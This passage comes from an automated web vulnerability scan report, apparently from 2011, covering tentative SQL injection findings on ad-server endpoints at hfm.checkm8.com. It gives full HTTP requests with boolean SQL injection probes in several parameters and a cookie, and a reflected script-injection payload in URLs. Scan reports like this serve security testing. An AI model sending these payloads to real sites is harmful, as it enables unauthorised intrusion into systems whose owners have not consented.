Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=87021414440%20or%201%3d2--%20&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:45 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=orL6Y9wx3NQ0caacbSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:04 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.6. http://hfm.checkm8.com/adam/detect [WIDTH parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087%20and%201%3d1--%20&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba;Path=/;
Set-cookie: C=onL6Y9wx3NQ0caaYaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:01 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087%20and%201%3d2--%20&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=onL6Y9wx3NQ0caaZaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:01 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228210170/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.7. http://hfm.checkm8.com/adam/detect [dt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The dt cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the dt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692'%20and%201%3d1--%20; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:06 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wdH68Sv9UJ7MTba;Path=/;
Set-cookie: C=oML6Y9wx3NQ0caascSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228215787/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692'%20and%201%3d2--%20; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:06 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oML6Y9wx3NQ0caatcSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:25 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 153976775/1228215787/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.8. http://hfm.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&1%20and%201%3d1--%20=1 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:15 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=oxY5Y9wQKLW1caaBdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:34 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&1%20and%201%3d2--%20=1 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:15 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=oxY5Y9wQKLW1caaCdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:35 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.9. http://hfm.checkm8.com/adam/detect [req parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The req parameter appears to be vulnerable to SQL injection attacks. The payloads 21397261'%20or%201%3d1--%20 and 21397261'%20or%201%3d2--%20 were each submitted in the req parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr21397261'%20or%201%3d1--%20&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:11 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=osY5Y9wQKLW1caa8cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:30 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr21397261'%20or%201%3d2--%20&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:11 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=osY5Y9wQKLW1caa9cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:05:30 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.10. http://hfm.checkm8.com/adam/detected [DATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The DATE parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the DATE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917'%20and%201%3d1--%20&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:19 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=oYL6Y9wdWQQ0caaGdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:38 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917'%20and%201%3d2--%20&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:19 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oYL6Y9wdWQQ0caaHdSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:38 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.11. http://hfm.checkm8.com/adam/detected [FL parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The FL parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the FL parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10'%20and%201%3d1--%20&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:49 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wmXIIUv9UJ7MTba;Path=/;
Set-cookie: C=o4Y5Y9wQKLW1caa0gSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:08 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10'%20and%201%3d2--%20&JE=1&UL=en&RES=RS21 HTTP/1.1
